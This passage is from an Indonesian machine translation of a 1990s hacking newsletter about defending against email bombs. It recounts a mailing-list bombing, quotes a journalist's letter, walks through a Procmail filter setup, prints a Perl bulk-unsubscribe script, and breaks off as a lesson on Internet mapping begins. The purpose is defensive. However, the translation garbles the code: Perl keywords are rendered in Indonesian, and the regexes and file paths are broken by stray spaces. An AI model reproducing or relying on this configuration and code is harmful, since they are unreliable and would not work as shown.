serangan datang dari satu atau beberapa host. Ini juga hanya berfungsi jika ISP Anda setuju untuk membantu Anda. ISP Anda
mungkin
hanya keluar ayam dan tutup akun Anda.
*****************************
Catatan pemula: router adalah komputer khusus yang mengarahkan lalu lintas. Tuan rumah adalah komputer di Internet.
*****************************
Tetapi bagaimana jika serangan itu datang dari banyak tempat di Internet? Itu terjadi pada saya pada hari Natal
ketika johnny yang marah mengambil pujian atas serangan pemboman email yang juga mengenai sejumlah tokoh AS yang
terkenal
seperti penginjil Billy Graham, Presiden Bill Clinton dan Ketua Dewan Perwakilan Rakyat AS
Newt Gingrich. (Saya malu untuk menemukan diri saya di perusahaan tersebut.)
Cara johnny yang marah menangani serangan ini adalah dengan membuat program yang akan menuju ke satu komputer yang
berjalan
program untuk menangani daftar email dan secara otomatis berlangganan targetnya ke semua daftar yang ditangani oleh
komputer itu.
Kemudian programnya pergi ke komputer lain yang menangani daftar email dan berlangganan targetnya ke semua daftar
itu ditangani, dan sebagainya.
Saya dapat memperbaiki masalah saya dalam beberapa menit setelah ditemukan. johnny telah berlangganan semua daftar ini ke
daftar saya
alamat cmeinel@swcp.com. Tetapi saya menggunakan domain pribadi saya, techbroker.com, untuk menerima email. Lalu aku
pipa semua
ini dari server nama saya di Highway Technologies ke akun apa pun yang menurut saya berguna saat itu. Jadi yang saya miliki
yang harus dilakukan adalah pergi ke situs web Highway Technologies dan mengkonfigurasi server email saya untuk mengirim
email ke yang lain
rekening.
**************************
Catatan pemula: server email adalah komputer yang menangani email. Ini adalah salah satu yang Anda kaitkan pribadi Anda
komputer ketika Anda memberinya perintah untuk mengunggah atau mengunduh email Anda.
**************************
*************************
Kiat jenius jahat: Anda dapat dengan cepat mengalihkan rute email dengan membuat file di akun shell Anda (Anda memang
memiliki shell
akun, bukan? AKUN AKUN! Semua peretas yang baik harus memiliki SHELL ACCOUNT!) Yang bernama
.meneruskan. File ini mengarahkan email Anda ke akun email lain pilihan Anda.
*************************
Jika johnny yang marah mengirim email ke cmeinel@techbroker.com, saya akan mengirim semua yang kasar ke dev / null
dan meminta koresponden saya mengirim email ke carolyn@techbroker.com, dll. Ini cara yang cukup fleksibel
menangani berbagai hal. Dan akun swcp.com saya bekerja dengan cara yang sama. ISP itu, Southwest Cyberport, menawarkan
setiap pengguna beberapa akun semua untuk harga yang sama, yang didasarkan pada total penggunaan. Jadi saya bisa membuat
email baru
alamat sesuai kebutuhan.
Peringatan - teknik ini - setiap teknik yang kami bahas di sini - masih akan menyebabkan Anda kehilangan beberapa email.
Tetapi saya
mencari, mengapa menjadi obsesif atasnya? Menurut sebuah penelitian oleh perusahaan paging besar, signifikan
persentase email hilang begitu saja. Tidak ada daemon mail yang memperingatkan bahwa pesan gagal, tidak ada. Itu hanya
masuk ke lubang hitam. Jadi, jika Anda mengandalkan setiap email yang dikirim orang kepada Anda, bermimpilah
di.
Tapi ini tidak menyelesaikan masalah ISP saya. Mereka masih harus berurusan dengan masalah bandwidth dari semua kesalahan
itu
banjir masuk. Dan itu banyak kasar. Salah satu sysadmin di Southwest Cyberport mengatakan kepada saya bahwa hampir setiap

Halaman 146
Suatu hari beberapa email luser mengebom salah satu pelanggan mereka. Sebenarnya, sangat luar biasa johnny yang marah
mendapat banyak hal
publisitas seperti yang dia lakukan, mengingat betapa bom email biasa. Jadi pada dasarnya setiap ISP memiliki
untuk menangani masalah bom email.
Bagaimana johnny marah bisa mendapatkan publisitas sebanyak yang dia lakukan? Anda bisa mendapatkan ide dari surat ini dari
Lewis Koch, jurnalis yang memecahkan cerita (dicetak dengan izinnya):
Dari: Lewis Z Koch <lzkoch@mcs.net>
Subjek: Pertanyaan
Carolyn:
Pertama, dan mungkin yang paling penting, ketika saya menelepon Anda untuk memeriksa apakah Anda memang dibom email,
Anda
cukup sopan untuk menanggapi dengan informasi. Saya pikir ini agak lancang bagi Anda untuk menyatakan itu
"Sebagai tanda hormat profesional, aku _membiarkan_ Lewis Koch mendapatkan sendok penuh." Ini adalah kisah yang, di
Bahkan, eksklusif.
(Catatan Carolyn: sebagai korban saya tahu perincian teknis tentang serangan yang tidak diketahui Koch. Tetapi sejak Koch
memberi tahu saya bahwa dia berhubungan dengan johnny yang marah dalam minggu - minggu menjelang pemboman email
massal
Natal 1996, dia jelas tahu lebih banyak daripada saya tentang daftar target johnny. Saya juga seorang
wartawan, tetapi ditunda untuk Koch dengan tidak mencoba untuk mengalahkannya ke sendok.)
Kedua, ya saya adalah pelanggan dan saya tertarik dengan ide-ide yang Anda kembangkan. Tapi bunga itu tidak
meluas untuk memberi makan Anda - atau satu individu atau kelompok -: "banyak detail menarik." Detail dari setiap cerita ada
dalam
tulisan dan komentar saya tawarkan kepada publik. "Juicy" adalah kata lain untuk sensasionalisme, pendekatan tabloid -
dan sesuatu yang dengan hati-hati saya hindari.
(Catatan Carolyn: Jika Anda ingin melihat apa yang ditulis Koch di johnny yang marah, Anda dapat melihatnya di Happy Hacker
Intisari 28 Desember 1996.)
Faktanya adalah saya sangat terkejut dengan beberapa reaksi yang saya terima dari individu, sebagian
siapa yang menjadi target, yang lain adalah pengamat.
Intinya adalah bahwa ada kerentanan luar biasa terhadap dan di Net - kerentanan yang ada
diabaikan ... atas bahaya kita semua.
Melanjutkan: "Namun, intinya adalah bahwa bomber email menggunakan teknik yang sangat lemah - begitu
lumpuh bahwa bahkan Carolyn Meinel dapat mematikan serangan hanya dalam beberapa menit. Goreng di dev / null, pembom
email! "
Johnny menegaskan beberapa kali bahwa serangan itu "sederhana." Itu sengaja dirancang untuk menjadi sederhana.
Saya membayangkan - saya tahu - bahwa jika dia, atau peretas lain telah memilih untuk melakukan kerusakan, kerusakan serius,
nyata, mereka dapat melakukannya
mudah melakukannya. Mereka memilih untuk tidak melakukannya.
Satu orang yang diserang dan marah dengan laporan saya. Dia menggunakan bahasa seperti "kampanyenya di
teror, "" pikiran bengkok dari 'johnny', "" psikopat seperti 'johnny', "" orang tolol mikroencephalic, "" picik
gangster "untuk menggambarkan johnny.
Pemikiran seperti ini mengabaikan sejarah dan kenyataan. Jika seseorang ingin menggunakan istilah seperti "kampanye teror"
mereka harus memeriksa sejarah Unabomber, atau kelompok yang mengebom Trade Center, atau
Gedung Federal di Kota Oklahoma ... atau lihat apa yang terjadi di Irlandia atau Israel. Di sana orang menemukan
"terorisme."

Halaman 147
Apa yang terjadi adalah ketidaknyamanan - yang setara, menurut perkiraan saya, dengan jenis ketidaknyamanan yang sama
orang-orang mengalami ketika orang-orang muda memblokir jalan-jalan di kota-kota besar sebagai protes terhadap perang di
Vietnam. Orang-orang
tidak nyaman --- tetapi para pengunjuk rasa membuat titik tentang perang ilegal dan tidak perlu yang bahkan
jaksa penuntut perang, seperti Robert McNamara tahu sejak awal adalah usaha yang hilang. Ratusan
ribuan
orang kehilangan nyawa mereka dalam perang itu - dan jika beberapa orang merasa dirinya tidak nyaman oleh orang-orang
memprotesnya - saya katakan, terlalu buruk.
Terima kasih telah meneruskan komentar saya ke daftar Anda
Ahem. Saya tersanjung, saya kira. Apakah Koch menyarankan daftar Happy Hacker - dengan kebiasaannya untuk keluar
kata-kata nakal - dan penginjil Billy Graham - yang imannya saya bagikan - adalah dari tingkat yang mengguncang Bumi
berita buruk politik yang sebanding dengan Perang Vietnam?
Jadi misalkan Anda merasa tidak apa-apa bagi peretas dua-bit untuk mencegah Anda menerima email.
apa sajakah cara lain untuk memerangi bom email?
Untuk pemboman menggunakan daftar email, salah satu pendekatan adalah menjalankan program yang memilah-milah banjir
awal dari
email bomb untuk pesan-pesan "Selamat Datang di Tomato Twaddler!" yang memberitahukan cara berhenti berlangganan.
Program-program ini kemudian secara otomatis membuat pesan berhenti berlangganan dan mengirimkannya.
Cara lain ISP Anda dapat membantu Anda adalah dengan menyediakan program yang disebut Procmail (yang berjalan di Unix
sistem operasi. Untuk detailnya, Zach Babayco (zachb@netcom.com) telah menyediakan artikel berikut. Terima kasih
kamu, Zach!
*******************************
Membela Terhadap Pemboman Email dan Surat yang Tidak Diinginkan
Hak Cipta (C) Zach Babayco, 1996
[Sebelum saya memulai artikel ini, saya ingin mengucapkan terima kasih kepada Nancy McGough karena mengizinkan saya
mengutip secara bebas darinya
Memfilter FAQ Surat, tersedia di http://www.cis.ohio-state.edu/hypertext/faq/usenet/mail/filtering-
faq / faq.html. Ini adalah salah satu FAQ pemfilteran email terbaik di luar sana, dan jika Anda memiliki masalah dengan saya
petunjuk arah atau ingin mempelajari lebih lanjut tentang memfilter surat, ini adalah tempat Anda harus mencari.]
Akhir-akhir ini, ada semakin banyak orang di luar sana yang mengirimi Anda email yang tidak Anda inginkan, seperti "Jadikan
Uang Cepat! "Sampah atau lumpuh ezines yang Anda tidak pernah minta atau inginkan di tempat pertama. Lebih buruk lagi, ada
bom email.
Ada dua jenis bom email, bom Massmail dan Milis:
1) Pemboman massal. Ini adalah ketika seorang penyerang mengirimi Anda ratusan, atau bahkan ribuan keping
email, biasanya melalui skrip dan surat palsu. Dari dua jenis ini, ini lebih mudah untuk dipertahankan,
karena pesan akan datang dari hanya beberapa alamat paling banyak.
2) Bom Milis. Dalam hal ini, penyerang akan berlangganan Anda ke milis sebanyak mungkin.
Ini jauh lebih buruk daripada surat massal karena Anda akan mendapatkan email dari berbagai milis, dan
harus menyimpan sebagian agar Anda dapat mengetahui cara berhenti berlangganan dari setiap daftar.
Di sinilah Procmail masuk. Procmail (diucapkan prok-mail) adalah program penyaringan email yang dapat melakukan
beberapa hal yang sangat rapi dengan surat Anda, seperti misalnya, jika Anda berlangganan beberapa milis volume tinggi,

Halaman 148
itu dapat diatur untuk mengurutkan email ke folder yang berbeda sehingga semua pesan tidak tercampur dalam email Anda
Kotak masuk. Procmail juga dapat dikonfigurasi untuk menghapus email dari orang dan alamat tertentu.
Menyiapkan Procmail
-------------------
Pertama, Anda perlu melihat apakah sistem Anda telah menginstal Procmail. Dari prompt, ketik:
> procmail mana
Jika sistem Anda telah menginstal Procmail, perintah ini akan memberi tahu Anda di mana Procmail berada. Tulis ini
- Anda akan membutuhkannya nanti.
* CATATAN * Jika sistem Anda memberi Anda respons seperti "Perintah tidak dikenal: yang" maka cobalah mengganti 'yang'
dengan 'type', 'where', atau 'whereis'.
Jika Anda masih tidak dapat menemukan Procmail, maka kemungkinan besar sistem Anda belum menginstalnya.
Namun, Anda tidak sepenuhnya kurang beruntung - lihat FAQ yang saya sebutkan di awal file ini dan
lihat apakah sistem Anda memiliki program yang dibicarakannya.
Selanjutnya, Anda harus mengatur file sumber daya untuk Procmail. Untuk sisa dokumen ini, saya akan menggunakan editor
Pico.
Anda dapat menggunakan editor mana saja yang Anda rasa nyaman.
Pastikan Anda berada di direktori home Anda, dan kemudian mulai editor Anda.
> cd
> pico .procmailrc
Masukkan yang berikut ini di file .procmailrc:
# Baris ini memberi tahu Procmail apa yang harus dimasukkan dalam file log-nya. Setel ke kapan
# Anda sedang debugging.
VERBOSE = mati
# Ganti 'email' dengan direktori email Anda.
MAILDIR = $ HOME / mail
# Di sinilah file logfile dan rc akan disimpan
PMDIR = $ HOME / .procmail
LOGFILE = $ PMDIR / log
# INCLUDERC = $ PMDIR / rc.ebomb
(ya, ketikkan baris INCLUDERC DENGAN #)
Sekarang Anda telah mengetik ini, simpan dan kembali ke direktori home Anda.
> cd
> mkdir .procmail
Sekarang masuk ke direktori yang baru saja Anda buat, dan mulai dengan editor Anda
file baru: rc.ebomb:

Halaman 149
PENTING: Pastikan Anda mematikan pembungkus kata editor Anda selama bagian ini. Kamu akan membutuhkan
memiliki baris kedua, ketiga, dan keempat dari contoh berikut ini semua dalam satu baris. Dengan Pico, gunakan bendera -w.
Lihat halaman manual editor Anda untuk instruksi mematikan pembungkusan kata. Pastikan kapan
Anda mengeditnya, Anda tidak meninggalkan spasi di baris itu.
> cd .procmail
> pico -w rc.noebomb
# noebomb - pemblokir bom email
:0
*! ^ ((((Membenci -)? (Dari | Pengirim) | X-Amplop-Dari): | Dari) (. * [^.% @ A-z0-9])?
(Posting (ma? (St (e? R)? | N) | kantor) | Mail (er)? | Daemon | mmdf | root | uucp | LISTSERV | pemilik
| permintaan | bouncing | serv (es? | er)) ([^.!: a-z0-9] | $)))
*! ^ Dari:. * (Postmaster | Mailer | listproc | ma jordomo | listserv | cmeinel | johnb)
*! ^ UNTUK (netstuff | komputasi | pcgames)
/ dev / null
Mari kita lihat apa yang dilakukannya. Baris pertama memberi tahu Procmail bahwa ini adalah awal dari file "resep". Sebuah
resep
pada dasarnya seperti apa itu - ia memberi tahu program apa yang harus dicari dalam setiap pesan email, dan jika itu
menemukan apa yang dicari, ia melakukan tindakan pada pesan
- meneruskannya ke seseorang; menaruhnya di folder tertentu; atau dalam hal ini, menghapusnya.
Baris kedua, ketiga, dan keempat (yang dimulai dengan a *) disebut KONDISI. Tanda bintang (*)
memberitahu Procmail bahwa ini adalah awal dari suatu kondisi. Itu! menyuruhnya melakukan OPPOSITE dari apa yang
seharusnya
biasanya.
Kondisi 1:
*! ^ ((((Membenci -)? (Dari | Pengirim) | X-Amplop-Dari): | Dari) (. * [^.% @ A-z0-9])?
(Posting (ma? (St (e? R)? | N) | kantor) | Mail (er)? | Daemon | mmdf | root | uucp | LISTSERV | pemilik
| permintaan | bouncing | serv (es? | er)) ([^.!: a-z0-9] | $)))
Jangan panik tentang ini, itu lebih sederhana daripada yang terlihat pada pandangan pertama. Kondisi ini memberitahu Procmail
untuk melihat
header pesan, dan lihat apakah itu berasal dari salah satu alamat administratif seperti root atau postmaster, dan
juga periksa untuk melihat apakah itu dari daemon-mailer (hal yang mengirimi Anda email saat Anda memantulkan pesan). Jika
sebuah pesan IS
dari salah satu alamat itu, resep akan memasukkan pesan ke kotak masuk Anda dan tidak menghapusnya.
Catatan Pengguna Lanjut: Anda yang terbiasa dengan Procmail mungkin bertanya-tanya mengapa saya membutuhkannya
pengguna untuk mengetikkan seluruh baris panjang perintah, alih-alih menggunakan perintah FROM_MAILER. Baik,
itu tampak seperti ide yang baik pada awalnya, tetapi saya baru tahu beberapa hari yang lalu bahwa FROM_MAILER juga
memeriksa
Precedence: header untuk kata-kata sampah, massal, dan daftar. Banyak (jika tidak semua) server milis memiliki salah satunya
Precedence: bulk or Precedence: list, jadi jika seseorang berlangganan Anda ke beberapa ratus daftar,
FROM_MAILER akan membiarkan sebagian besar pesan masuk, BUKAN yang kami inginkan.
Kondisi 2:
*! ^ Dari:. * (Listproc | majordomo | cmeinel | johnb)
Kondisi ini melakukan beberapa pemeriksaan lebih lanjut dari Dari: baris di header. Dalam contoh ini, ia memeriksa
kata listproc, majordomo, cmeinel, dan johnb. Jika itu dari salah satu dari orang-orang itu, akan diteruskan ke Anda
Kotak masuk. Jika tidak, itu akan mati. Di sinilah Anda akan meletakkan nama pengguna

Halaman 150
orang yang biasanya mengirim email kepada Anda, dan juga nama pengguna server milis, seperti listproc dan
majordomo. Saat mengedit baris ini, ingatlah untuk: hanya menempatkan nama pengguna dalam kondisi, bukan orang yang
penuh
alamat email, dan ingat untuk meletakkan | antara setiap nama.
Kondisi 3:
*! ^ TO (netnews | crypto-stuff | pcgames)
Kondisi terakhir ini adalah tempat Anda akan memasukkan nama pengguna milis tempat Anda berlangganan (jika
apa saja). Sebagai contoh, saya berlangganan netnews, crypto-stuff, dan daftar pcgames. Ketika Anda mendapatkan
pesan dari sebagian besar milis, sebagian besar waktu alamat daftar akan di
Ke: atau Cc: bagian dari tajuk, bukan bagian Dari:. Baris ini akan memeriksa nama pengguna dan lulus
mereka masuk ke Kotak Masuk Anda jika mereka cocok. Instruksi pengeditan sama dengan instruksi untuk Kondisi 2.
Baris terakhir, / dev / null, pada dasarnya adalah tempat sampah sistem Anda. Jika sepotong email tidak cocok dengan
kondisi, (yaitu bukan dari administrator surat, itu bukan dari server daftar atau seseorang yang Anda kirimi surat, dan itu
bukan pesan dari salah satu milis Anda yang biasa) Procmail mengirim pesan ke / dev / null, tidak pernah ada
terlihat lagi.
Baik. Sekarang Anda seharusnya membuat dua file: .procmailrc dan rc.noebomb. Kami membutuhkan satu lagi sebelumnya
semuanya akan bekerja dengan baik. Simpan rc.noebomb dan keluar dari editor Anda, dan buka direktori home Anda. Sekali
di sana, mulai editor Anda dengan perintah tanpa kata pembungkus.
> cd
> pico -w .forward
Kita sekarang pergi ke kutipan dari FAQ Penyaringan Surat Nancy M.:
Masukkan versi modifikasi dari yang berikut ini di ~ / .forward Anda:
"| IFS = '' && exec / usr / local / bin / procmail -f- || keluar 75 #nancym"
== CATATAN PENTING ==
* Pastikan Anda memasukkan semua tanda kutip, baik ganda (") dan tunggal (').
* Bilah vertikal (|) adalah pipa.
* Ganti / usr / local / bin dengan jalur yang benar untuk procmail (lihat langkah 1).
* Ganti `nancym 'dengan userid Anda. Anda harus memasukkan userid kami ke dalam .forward Anda sehingga
berbeda dari yang lain. ile ke depan pada sistem Anda.
* JANGAN gunakan ~ atau variabel lingkungan, seperti $ HOME, dalam file .forward Anda. Jika procmail berada di bawah
direktori home Anda menuliskan path * full *.
Pada banyak sistem, Anda perlu membuat dunia .forward Anda
dapat dibaca dan dunia direktori rumah Anda dapat dicari agar agen pengiriman surat dapat "melihatnya". Melakukan
tipe ini:
CD
chmod 644. ke depan
chmod a + x.
Jika templat .forward di atas tidak berfungsi alternatif berikut mungkin berguna:
Di dunia yang sempurna:
"| exec / usr / local / bin / procmail #nancym"
Di dunia yang hampir sempurna:

Halaman 151
"| exec / usr / local / bin / procmail USER = nancym"
Di dunia lain:
"| IFS = ''; exec / usr / local / bin / procmail #nancym"
Di dunia yang berbeda:
"| IFS = ''; exec / usr / local / bin / procmail USER = nancym"
Di dunia smrsh:
"| / usr / local / bin / procmail #nancym"
Sekarang Anda memiliki semua file yang diperlukan dibuat, saatnya untuk menguji filter ini. Pergilah ke pembaca surat Anda
dan buat
folder baru bernama Ebombtest. Prosedur ini berbeda dari satu program ke program lainnya, jadi Anda mungkin harus
melakukannya
bereksperimen sedikit. Kemudian buka file rc.noebomb dan ubah / dev / null ke Ebombtest. (Kamu harus punya
sudah mengubah Ketentuan 2 dan 3 menjadi apa yang Anda inginkan; jika tidak, lakukan sekarang!) Akhirnya, buka .procmailrc
dan hapus # dari baris terakhir.
Anda harus membiarkan ini aktif sebentar untuk mengujinya. Minta beberapa orang di Kondisi 2 untuk mengirimi Anda beberapa
pesan uji. Jika pesan berhasil masuk ke Kotak Masuk Anda, maka kondisi itu berfungsi dengan baik. Kirim
buat sendiri email palsu dengan nama yang berbeda dan periksa untuk melihat apakah itu
berakhir di folder Ebombtest. Juga, kirimkan sendiri beberapa fakemail dari root@wherever.com untuk memastikan
Kondisi 1 itu bekerja. Jika Anda berada di milis apa saja, pesan-pesan itu seharusnya berakhir di Kotak Masuk Anda sebagai
baik.
Jika semua tes ini baik-baik saja, maka selamat! Anda sekarang memiliki pertahanan yang berfungsi terhadap bom email.
Untuk saat ini, ubah baris Ebombtest di file rc.noebomb kembali ke / dev / null, dan letakkan # di depan
baris INCLUDERC dalam file .procmailrc. Jika seseorang memutuskan untuk mengirim email kepada Anda, Anda hanya perlu
melakukannya
hapus #, dan Anda akan sangat mengurangi jumlah pesan yang masuk ke Kotak Masuk Anda,
memberi Anda sedikit ruang bernapas untuk mulai berhenti berlangganan semua daftar itu, atau mulai melacaknya
idiot yang melakukannya dan mendapatkan mereka
keledai menggebrak ISP mereka.
Jika Anda memiliki komentar atau pertanyaan tentang ini, email saya di zachb@netcom.com. EmailBAM AKAN pergi
ke / dev / null, jadi jangan repot-repot!
Penafian: Ketika Anda mengaktifkan program ini, tidak dapat dihindari bahwa sejumlah kecil surat yang diinginkan DAPAT
dimasukkan
ke / dev / null, karena fakta bahwa hampir tidak mungkin untuk mengetahui nama-nama semua orang yang dapat menulis
kepadamu. Karena itu, saya tidak bertanggung jawab atas email apa pun yang
mungkin hilang, dan kerusakan yang mungkin datang dari pesan-pesan yang hilang.
********************
Tidak punya procmail? Jika Anda memiliki kotak Unix, Anda dapat mengunduh procmail dari ftp: //ftp.informatik.rwth-
aachen.de/pub/packages/procmail/
*********************
Catatan terima kasih diberikan kepada Damien Sorder (jericho@dimensional.com) atas bantuannya dalam meninjau hal ini
panduan.
Dan sekarang, hanya untuk memastikan Anda bisa mendapatkan skrip Perl yang sangat berharga ini untuk secara otomatis
berhenti berlangganan email
daftar, ini daftar:
#! / usr / local / bin / perl
# berhenti berlangganan
#
# Naskah perl oleh Kim Holburn, University of Canberra 1996.
# kim@canberra.edu.au

Halaman 152
# Jangan ragu untuk menggunakan ini dan menyesuaikannya. Jika Anda melakukan penyesuaian yang bermanfaat atau
# tambahan kirim kembali ke saya.
#
# Skrip ini akan berhenti berlangganan pengguna dalam jumlah besar dari daftar surat apa pun mereka
# berlangganan ke. Ini juga mengirimi mereka email bahwa mereka telah melakukan ini.
# Ini berguna untuk admin sistem sistem besar dengan banyak akun dan
# populasi mengambang, seperti server siswa.
# Skrip ini harus dijalankan oleh root walaupun saya tidak memeriksa ini.
# Anda harus menjadi root untuk membaca kotak surat orang lain dan untuk
# su ke akun mereka, yang keduanya harus dilakukan skrip ini.
#
# Skrip ini bila diterapkan ke kotak surat akan mencari untuk menemukan
# setiap email yang dikirim oleh milis, usahakan untuk menentukan alamat
# milis dan kemudian mengirim pesan berhenti berlangganan dari pengguna itu.
# Jika dipanggil tanpa opsi hanya nama kotak surat yang akan diasumsikan
# nama file kotak surat sama dengan nama pengguna, seperti di bawah sinar matahari.
#
# Rincian teknis:
# Untuk menemukan email dari milis, ia mencari "pemilik" sebagai bagian dari
# alamat email asal di baris BSD From (amplop).
# daftar server yang tidak melakukan ini akan terlewatkan jika Anda dapat mencari cara
# sekeliling ini beri tahu saya.
# Script tidak melakukan penguncian file apa pun tetapi kemudian hanya membaca kotak surat
# file.
sub fail_usage {
if (@_ ne '') {print "Error:", @_, "\ n"; }
print "Penggunaan: $ 0 [-d] kotak surat \ n";
print "Penggunaan: $ 0 [-d] -u kotak pesan pengguna \ n";
print "Penggunaan: $ 0 [-d] -u pengguna -l listname -h host -server list \ n";
cetak "di mana listserver adalah alamat email lengkap dari listserver \ n";
keluar;
}
sub unsub {
local ($ myuser, $ mylist, $ myhost, $ myaddress) = @_;
if (! $ debug) {
if (! open (KIRIM,
"| (USER = $ myuser; LOGNAME = $ myuser; su $ myuser -c \" / usr / ucb / mail $ myaddress \ ")"))
{print "Tidak dapat membuka mailer untuk pengguna \" $ myuser \ "\ n"; berikutnya; }
cetak KIRIM "berhenti berlangganan $ mylist \ n";
tutup KIRIM;
} lain {
cetak "No unsub \" $ myuser \ "on \" $ mylist @ $ myhost \ "ke: \ n";
cetak "$ myaddress \ n";
}
}
sub notify {
local ($ myuser, $ mylist, $ myhost, $ myaddress) = @_;
if (! $ debug) {
if (! open (KIRIM, "| / usr / ucb / mail -s \" tidak berlangganan $ mylist \ "$ myuser"))
{print "Tidak dapat membuka mailer untuk pengguna \" $ myuser \ "\ n"; berikutnya; }

Halaman 153
$ mess = << EOM;
Anda telah berhenti berlangganan secara otomatis dari milis:
$ mylist @ $ myhost
untuk berlangganan kembali ikuti arahan asli atau
EOM
cetak KIRIM $ mess;
if ($ myaddress! ~ /, /) {
print KIRIM "kirim pesan ke alamat $ myaddress \ n";
} lain {
cetak KIRIM "kirim pesan ke alamat yang sesuai: \ n";
print KIRIM "$ myaddress \ n";
}
$ mess4 = << EOM2;
tanpa subjek, tanpa tanda tangan, dan satu baris:
berlangganan (nama Anda)
EOM2
cetak KIRIM $ mess4;
tutup KIRIM;
} lain {
cetak "No notify \" $ myuser \ "on \" $ mylist @ $ myhost \ "ke: \ n";
cetak "$ myaddress \ n";
}
}
$ debug = 0;
$ usersupplied = 0;
while (($ # ARGV> (-1)) && ($ ARGV [0] = ~ / ^ - /)) {
if ($ ARGV [0] eq '-d') {shift ARGV; $ debug = 1; }
elsif ($ # ARGV <1) {& fail_usage ("option \" $ ARGV [0] \ "butuh argumen"); }
elsif ($ ARGV [0] eq '-u') {shift ARGV; $ user = shift ARGV; }
elsif ($ ARGV [0] eq '-l') {shift ARGV; $ list = shift ARGV; }
elsif ($ ARGV [0] eq '-h') {shift ARGV; $ host = shift ARGV; }
elsif ($ ARGV [0] eq '-a') {shift ARGV; $ address = shift ARGV; }
else {& fail_usage (); }
}
$ usersupplied = ($ user ne '');
#print "debug d = \" $ debug \ "u = \" $ user \ "l = \" $ list \ "h = \" $ host \ "\ n";
#print "debug \ $ # ARGV = $ # ARGV a = \" $ address \ "\ n";
if ($ # ARGV == (-1)) {
if ($ usersupplied && $ list ne '' && $ host ne '' && $ address ne '' && $ # ARGV) {
$ list = ~ s /@.*$//;
$ user = ~ s /@.*$//;
$ host = ~ s/^.*@//;
if ($ address! ~ / @ /) {& fail_usage ("bad address"); }
& unsub ($ user, $ list, $ host, $ address);
& beri tahu ($ user, $ list, $ host, $ address);
keluar;
} else {& fail_usage ("tidak ada file dan tidak ada alamat"); }
}
if ($ usersupplied && $ # ARGV> 0) {& fail_usage (); }

Halaman 154
foreach $ file (@ARGV) {
% address = ();
if (! $ usersupplied) {$ user = $ file; }
$ user = ~ s @ ^. * / @@;
if ($ file = ~ /^\./) {print "melewatkan jenis file yang salah \" $ file \ "\ n"; berikutnya; }
if ($ file = ~ /\.lock/)
{print "melewatkan file kunci \" $ file \ "\ n"; berikutnya; }
if ($ file = ~ / \./) {print "melewatkan jenis file yang salah \" $ file \ "\ n"; berikutnya; }
$ user = ~ s /^\.//;
$ user = ~ s /\..*$//;
if (! open (MYFILE, "<$ file"))
{print "Tidak dapat membuka file \" $ file \ "\ n"; berikutnya; }
cetak "-------------------------- membuka file \" $ file \ "\ n";
while (<MYFILE>) {
# if (/ (\ bnews - [- \ w.] + @) | ([- \ w.] + - news @) / i)
# if (/(\brequest-[-\w.[+@)|([-\w.[+-request@)/i)
if (/(#bowner-[-\w.[+@)|([-\w.[+-owner@)/i) {
memotong;
tr / AZ / az /;
if (/ \bowner-[-\w.[+@/) {s /^.* \ bowner - ([- \ w.] + @ [\ w.] +) \ b. * $ / \ 1 / ; }
lain {s / (^ | ^. * [^ - \ w.]) ([- \ w.] +) - pemilik (@ [\ w.] +) \ b. * $ / \ 2 \ 3 /; }
if (/[^a-z0-9@.-[/) {next; }
if (! defined ($ address {$ _})) {$ address {$ _} = ""; }
}
if (/(\bl-[-\w.[+@)|([-\w.[+-l@)/i) {
memotong;
tr / AZ / az /;
if (/ \bl-[-\w.[+@/) {s /^.* \ bl - ([- \ w.] + @ [\ w.] +) \ b. * $ / \ 1 / ; }
lain {s / (^ | ^. * [^ - \ w.]) ([- \ w.] +) - l (@ [\ w.] +) \ b. * $ / \ 2 \ 3 /; }
if (/[^a-z0-9@.-[/) {next; }
if (! defined ($ address {$ _})) {$ address {$ _} = ""; }
}
}
tutup MYFILE;
while (($ key, $ value) = setiap% alamat) {print "$ key \ n"; }
if (! keys% address) {print "no listservers \ n"; berikutnya; }
if (! open (MYFILE, "<$ file"))
{print "Tidak dapat membuka file \" $ file \ "\ n"; berikutnya; }
cetak "mencari alamat server daftar \ n";
while (<MYFILE>) {
foreach $ address (keys% address) {
$ host = $ address;
$ host = ~ s/^.*@//;
if (/ (listserv | listproc | majordomo) @ $ host / i) {
$ address {$ address} = $ 1;
# print "ditemukan 1 = \" $ 1 \ "\ n";
}
}
}
tutup MYFILE;
while (($ key, $ value) = setiap% alamat) {
$ host = $ key;
$host=~s/^.*@//;
$ list = $ key;

Halaman 155
$ list = ~ s /@.*$//;
# print "$ value @ $ host key = \" $ key \ "list = \" $ list \ "\ n";
if ($ value eq '')
{$ address = "listserv @ $ host, listproc @ $ host, majordomo @ $ host"; }
else {$ address = "$ value @ $ host"; }
print "address = \" $ address \ "\ n";
cetak "berhenti berlangganan $ daftar \ n";
if (! $ debug) {
cetak "Mailing $ user \ n";
& unsub ($ user, $ list, $ host, $ address);
& beri tahu ($ user, $ list, $ host, $ address);
} lain {
cetak "debug no mail \ n";
}
}
}
____________________________________________________________
PANDUAN UNTUK (kebanyakan) HACKING HARMLESS
Vol. 3 Angka 2
Cara memetakan Internet. Menggali! Siapa yang! Nslookup! Traceroute! Port Netstat semakin sulit digunakan,
namun...
____________________________________________________________
Mengapa memetakan Internet?
* Karena itu menyenangkan - seperti menjelajahi benua yang tidak dikenal. Internet sangat besar, dan berubah sangat cepat, tidak
seseorang memiliki peta yang lengkap.
* Karena ketika Anda tidak dapat melakukan kontak dengan seseorang di tempat yang jauh, Anda dapat membantu masalah ISP
Anda
bidik tautan yang rusak di Internet. Ya, saya pernah melakukan itu ketika email gagal ke teman di Irlandia Utara.
Bagaimana ISP Anda tahu bahwa penyedia komunikasi mereka berbaring di tempat kerja kecuali seseorang
menasihati mereka dari masalah?
* Karena jika Anda ingin menjadi penjahat komputer, peta koneksi Anda kepada korban yang Anda inginkan memberikan
Anda informasi berharga.
Sekarang karena ini adalah pelajaran tentang peretasan * legal *, kami tidak akan membantu Anda mengetahui cara menentukan
kotak terbaik untuk memasang sniffer atau cara memberi tahu alamat IP mana yang harus dipalsukan untuk melewati filter paket.
Kami
hanya akan menjelajahi beberapa alat terbaik yang tersedia untuk memetakan ranah Internet yang belum dipetakan.
Untuk pelajaran ini, Anda bisa mendapatkan beberapa manfaat bahkan jika yang Anda miliki adalah Windows. Tetapi untuk
mengambil keuntungan penuh dari ini
pelajaran, Anda harus memiliki semacam Unix di komputer pribadi Anda, atau akun shell! KULIT
REKENING! Jika Anda tidak memilikinya, Anda mungkin menemukan ISP yang akan memberi Anda akun shell di
http://www.celestin.com/pocia/.
****************************
Catatan pemula: Akun shell adalah akun di ISP Anda yang memungkinkan Anda memberi perintah di komputer
